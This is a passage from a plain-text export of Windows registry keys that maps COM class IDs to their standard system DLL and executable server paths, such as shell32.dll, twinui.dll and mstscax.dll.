(Default) REG_EXPAND_SZ %SystemRoot%\system32\dssec.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4E77131D-3629-431c-9818-C5679DC83E81}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4E7D6B2C-1F7E-45B6-9EC0-8FA541BDD163}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4eb2f086-c818-447e-b32c-c51ce2b30d31}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4eb89ff4-7f78-4a0f-8b8d-2bf02e94e4b2}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4EDCB26C-D24C-4e72-AF07-B576699AC0DE}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4eeb9b7c-0f47-4fae-a284-a0ec40c5719a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CapabilityAccessHandlers.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4EF5D9A8-0116-4C93-8142-0AB93AB603A5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4F1DFCA6-3AAD-48E1-8406-4BC21A501D7C}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wksprt.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4F23C296-F56E-45AF-904D-D245BF750759}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4f37e3a9-1d2b-42ab-a5b0-31fc05627def}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4F414126-DFE3-4629-99EE-797978317EAD}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4f495385-cab7-4470-9e0d-1bc0ec792e04}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4F4DB904-CA35-4A3A-90AF-C9D8BE7532AC}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Engines\SR\spsrx.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4F4DD15E-F431-4536-AEE8-AF20BA847A33}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4F637904-2CAB-4F0E-8688-D3717EBD2975}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\GPEdit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4F664F91-FF01-11D0-8AED-00C04FD7B597}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\oleprn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4f6bcd94-c2a5-42ce-8dbc-31e794be4630}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shacct.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4F786E23-0F32-4888-BA02-6BB105AE3024}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4f8e67d6-de03-480b-80aa-52f9c1aeffea} LocalServer32 REG_EXPAND_SZ %SystemRoot%\System32\WUDFHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4FA18276-912A-11D1-AD9B-00C04FD8FDFF}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4fab6371-6d65-47ba-b8f1-ca6273c6c69e}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4FDBC3E5-7121-4487-AB95-B58EC04648DB}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ucmhc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4FDEF69C-DBC9-454e-9910-B34F3C64B510}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4FE8C25F-C8E9-4322-98EE-A11E117CF049}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ppcsnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4FF2FE0E-E74A-4B71-98C4-AB7DC16707BA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4FF787E6-9A86-4BA3-BED9-8019A2B4BE1C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50040C1D-BDBF-4924-B873-F14D6C5BFD66}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\System32\mswmdm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{500DD1A1-B32A-4a37-9283-1185FB613899}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\timedate.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5014B7C8-934E-4262-9816-887FA745A6C4}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\TpmTasks.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{506229ae-09c7-4ffd-8ec9-6a957f6da601}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5088B39A-29B4-4d9d-8245-4EE289222F66}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50A41EF1-6BFA-4b7e-973E-798EA0BEBAD4}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\configmanager2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50B1904B-F28F-4574-93F4-0BADE82C69E9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50B6327F-AFD1-11d2-9CB9-0000F87A369E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\adsldp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CA0A46-1588-4161-8ED2-EF9E469CED5D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50D42F09-ECD1-4B41-B65D-DA1FDAA75663}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50D5107A-D278-4871-8989-F4CEAAF59CFC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msimtf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50FDBB99-5C92-495E-9E81-E2C2F48CDDAE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{513a0312-3345-4d16-94e5-630b0262c2eb}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\acppage.dll,-6006 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{514B5E31-5596-422F-BE58-D804464683B5} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\intl.cpl,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{514B5E31-5596-422F-BE58-D804464683B5}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\intl.cpl,-200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{514B5E31-5596-422F-BE58-D804464683B5}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\intl.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{51571744-7FE4-4FF2-A498-2DC34FF74F1B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MSVideoDSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{515980c3-57fe-4c1e-a561-730dd256ab98}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{515980c3-57fe-4c1e-a561-730dd256ab98}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {515980c3-57fe-4c1e-a561-730dd256ab98} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5160F343-7A1F-46C2-9E21-FC7F1DAF37F3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{51648e7c-d7b2-449c-b513-46050dcfd917}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LegacyNetUX.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{51653423-E62D-4FF7-894A-DABB2B8E21E2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{517F6AA6-D6FA-46D0-8094-17FF17E4CCF4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\listsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{51a1467f-96a2-4b1c-9632-4b4d950fe216} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-31478 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{51a1467f-96a2-4b1c-9632-4b4d950fe216}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-63012 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{51a1467f-96a2-4b1c-9632-4b4d950fe216}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{51ad6d44-32f8-4aa7-9ee6-24a37fa09354}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.UI.Immersive.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{51D1268C-D0A5-47CC-A514-547F346F45E8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{520E9D28-64C4-43df-BEED-02D9A6044A4B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\FdDevQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52205fd8-5dfb-447d-801a-d0b52f2e83e1} (Default) REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-22067 MUIVerb REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-37411 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52205fd8-5dfb-447d-801a-d0b52f2e83e1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{522e34a4-07f7-40a1-94d0-1bfe832efc3a}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5255EFED-103A-4444-B124-F88F99E4EF8D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\listsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{525C410E-B007-4F15-81DD-49DF9B17139B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Vault.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{527c9a9b-b9a2-44b0-84f9-f0dc11c2bcfb}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcServer32 (Default) REG_EXPAND_SZ %Systemroot%\System32\msctf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52B65EB7-907C-4D83-A535-283BE9104DE4}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\TelephonyInteractiveUser.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52C84ACA-027A-4536-A74A-E0BB50C44782}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\iscsiwmiv2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52ce2fe5-04c3-42fd-8a8b-4251affb8408}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52F15C89-5A17-48e1-BBCD-46A3F89C7CC2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5310BE71-5C14-4FBC-8CF5-BD75D3F11A44}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{531A5E27-80E7-4EAC-9AC6-13953AF33693}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5326dddc-ec38-428d-b219-ce6dadb35de3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\van.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{53445BED-3213-453B-A12A-79AA20A702DC}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\printui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-31361 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-4161 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-27 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{53a01e9d-61cc-4cb0-83b1-31bc8df63156}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{53bd6b4e-3780-4693-afc3-7161c2f3ee9c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{53BEDF0B-4E5B-4183-8DC9-B844344FA104} DisplayName REG_EXPAND_SZ @%systemroot%\system32\mssvp.dll,-127 Icon REG_EXPAND_SZ %systemroot%\system32\mssvp.dll,-504 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{53BEDF0B-4E5B-4183-8DC9-B844344FA104}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mssvp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{53C74826-AB99-4d33-ACA4-3117F51D3788}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{53D6AB1D-2488-11D1-A28C-00C04FB94F17}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\certmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{53DEC7F6-5448-43E2-9573-3F7B91B751DC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeviceSetupManagerAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{53E9771B-6A21-4FEC-B8F1-3B0DAE4FACC6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{54058896-4775-4C34-8B62-789FB2E263A4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5408B2F0-C816-11D1-8F99-00600895E7D5}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtctm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{540D8A8B-1C3F-4E32-8132-530F6A502090} MenuTextPUI REG_EXPAND_SZ @%SystemRoot%\System32\msutb.dll,-328 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{540D8A8B-1C3F-4E32-8132-530F6A502090}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msutb.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{541987EE-0E02-411E-9A85-1FC6156E7F4B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{545AE700-50BF-11D1-9FE9-00600832DB4A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cic.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{548968f5-17f7-4751-a581-ff0f1c732995}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\credprovhost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{548F0526-B0EC-4915-9C4E-9CEE327CF105}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\BrowserSettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5491AB67-AFEB-48B1-B8DF-B2D63810EF40}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{549365d0-ec26-11cf-8310-00aa00b505db}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{549e57e9-b362-49d1-b679-b64d510efe4b}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {549e57e9-b362-49d1-b679-b64d510efe4b} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{54CE37E0-9834-41ae-9896-4DAB69DC022B}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{54d38bf7-b1ef-4479-9674-1bd6ea465258}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{54E14197-88B0-442F-B9A3-86837061E2FB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CoreShellExtFramework.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\directmanipulation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{550DDA30-0541-11D2-9CA9-0060B0EC3D39}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5537E283-B1E7-4EF8-9C6E-7AB0AFE5056D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasplap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{558E3D9C-F033-4A44-A019-4F3F39EC8E4F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeviceSetupManagerAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{55B3A0BD-4D28-42fe-8CFB-FA3EDFF969B8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rdbui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{55d7b852-f6d1-42f2-aa75-8728a1b2d264}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{562462DD-4F9A-4110-9D6A-C3CA0407FF76}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioses.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56276483-5c2d-472c-b375-23ce4eb6a4f9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\RdpSaPs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5645C8C2-E277-11CF-8FDA-00AA00A14F93}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mimefilt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{566296fe-e0e8-475f-ba9c-a31ad31620b1}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dxp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5672BB8A-BBF5-482E-B7B9-742C70C604D8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppointmentActivation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56871D63-FE46-4c7e-84BB-5DB82D4A99F8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56a91da5-5051-49f5-8d23-1f050a63e966}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56ad4c5d-b908-4f85-8ff1-7940c29b3bcf}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56DA6136-B95E-4249-BB50-E4773A2B3B5E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56EA1054-1959-467f-BE3B-A2A787C4B6EA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shacctprofile.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{573bdf38-df23-427f-acb8-a67abd702698}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\System32\vssapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{57523D96-B7F6-4D2C-8AFC-BCC5F5392E94}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Engines\SR\spsreng_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{57558531-C262-471E-95DB-8B181925C61B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{57635537-C856-4cc2-AE5C-62C34708070C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{57651662-CE3E-11D0-8D77-00C04FC99D61}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{576C5669-E07F-4a1b-9A7A-8F85D944283B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{576C9E85-1300-4EF5-BF6B-D00509F4EDCD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{577289b6-6e75-11df-86f8-18a905160fe0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wpnprv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{57756B48-2D36-478F-B4F4-E8C67C5A9454}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\locationapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5791BC26-CE9C-11D1-97BF-0000F81E849C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\wbemdisp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{57B67A1A-2C81-4820-96EC-FA33567A9155}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5805137A-E348-4F7C-B3CC-6DB9965A0599}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58141F2A-7598-4B93-9D77-4ADF00E044B8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58221C65-EA27-11CF-ADCF-00AA00A80033}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\filemgmt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58221C66-EA27-11CF-ADCF-00AA00A80033}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\filemgmt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58221C67-EA27-11CF-ADCF-00AA00A80033} MUIVerb REG_EXPAND_SZ @%systemroot%\system32\mycomput.dll,-400 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58221C69-EA27-11CF-ADCF-00AA00A80033}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\filemgmt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58221C6A-EA27-11CF-ADCF-00AA00A80033}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\filemgmt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5842a140-ff9f-4166-8f5c-62f5b7b0c781}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5860E1C5-F95C-4a7a-8EC8-8AEF24F379A1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SysFxUI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{586d1936-bc46-4f9c-bf65-77c95ad9d9ad}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58859c43-2c82-454b-86c0-9efb11e54838}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58AB2366-D597-11d1-B90E-00C04FC9B263}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rastlsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58c061d5-8c8f-4439-b50a-bb5f7356e621}\InProcServer32 (Default) REG_EXPAND_SZ 